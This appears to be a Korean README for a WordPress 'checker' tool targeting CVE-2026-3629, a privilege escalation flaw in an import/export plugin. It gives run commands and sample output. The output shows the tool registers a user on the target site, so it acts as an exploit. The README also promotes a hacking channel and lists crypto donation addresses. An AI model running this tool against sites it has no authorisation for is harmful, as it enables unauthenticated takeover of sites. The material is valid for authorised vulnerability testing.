
WordPress 권한 상승 체커
CVE-2026-3629를 탐지하는 명령줄 도구로, "Import and export users and customers" WordPress 플러그인의 치명적인 권한 상승 취약점입니다.
최신 보안 도구, 취약점, 해킹 기술에 대한 업데이트를 받아보세요!
👉 채널: @PySecTools
설명: 이 플러그인의 save_extra_user_profile_fields 함수는 사용자 메타 키를 제한하지 못합니다. wp_capabilities 키가 차단되지 않아 인증되지 않은 공격자가 관리자 권한을 얻을 수 있습니다.
영향을 받는 버전: ≤ 1.29.7 (1.29.8+에서 수정됨)
악용 전제 조건 (두 가지 모두 필요):
wp_capabilities 열이 포함된 CSV가 가져와져야 함영향: 전체 관리자 액세스, 사이트 탈취, 악성 플러그인 설치.
발견자: Supanat Konprom | 공개일: 2026년 3월 21일
git clone https://github.com/PySecTools/CVE-2026-3629-Checker.git
cd CVE-2026-3629-Checker
pip install requests colorama
python3 cve_2026_3629_checker.py <URL> [OPTIONS]
| 명령 | 설명 |
|---|---|
python3 cve_2026_3629_checker.py http://example.com | 기본 설정으로 실행 |
╔══════════════════════════════════════════════════════╗
║ WordPress Privilege Escalation Checker ║
║ Single Target Mode ║
╚══════════════════════════════════════════════════════╝
════════════════════════════════════════
Target: http://vulnerable-site.com
════════════════════════════════════════
[✓] VULNERABLE! User 'test_username' created successfully!
[+] URL: http://vulnerable-site.com
════════════════════════════════════════
[✓] RESULT: VULNERABLE ✓
════════════════════════════════════════
[✗] SAFE (Registration is blocked/disabled)
════════════════════════════════════════
[✗] RESULT: NOT VULNERABLE ✗
════════════════════════════════════════
교육 및 승인된 테스트 목적으로만 사용하세요. 소유한 시스템이나 테스트에 대한 서면 허가를 받은 시스템에서만 사용하십시오. 무단 사용은 불법입니다.
USDT (TRC20): TNia5W6TameZ81y6FaSU3RhefYPnFDBZou
USDT (BSC - BEP20): 0x494f424e34840b21597ad75fc092a8d200655257
MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하세요.
⭐ 이 저장소가 도움이 되었다면 Star를 눌러주세요!
| 속성 | 값 |
|---|
| CVE ID | CVE-2026-3629 |
| CVSS 점수 | 8.1 (높음) |
| 공격 벡터 | 네트워크 |
| 필요 권한 | 없음 |
| CWE | CWE-269 (잘못된 권한 관리) |
python3 cve_2026_3629_checker.py http://example.com -u hacker -e [email protected] | 사용자 지정 사용자 이름 및 이메일 |
python3 cve_2026_3629_checker.py http://example.com -t 15 | 타임아웃을 15초로 설정 |
python3 cve_2026_3629_checker.py https://target.com -u admin -e [email protected] -t 20 | 전체 옵션 |
| 인자 | 기본값 | 설명 |
|---|
url | 필수 | 대상 WordPress URL |
-u, --username | test_username | 테스트 사용자 이름 |
-e, --email | [email protected] | 테스트 이메일 |
-t, --timeout | 30 | 초 단위 타임아웃 |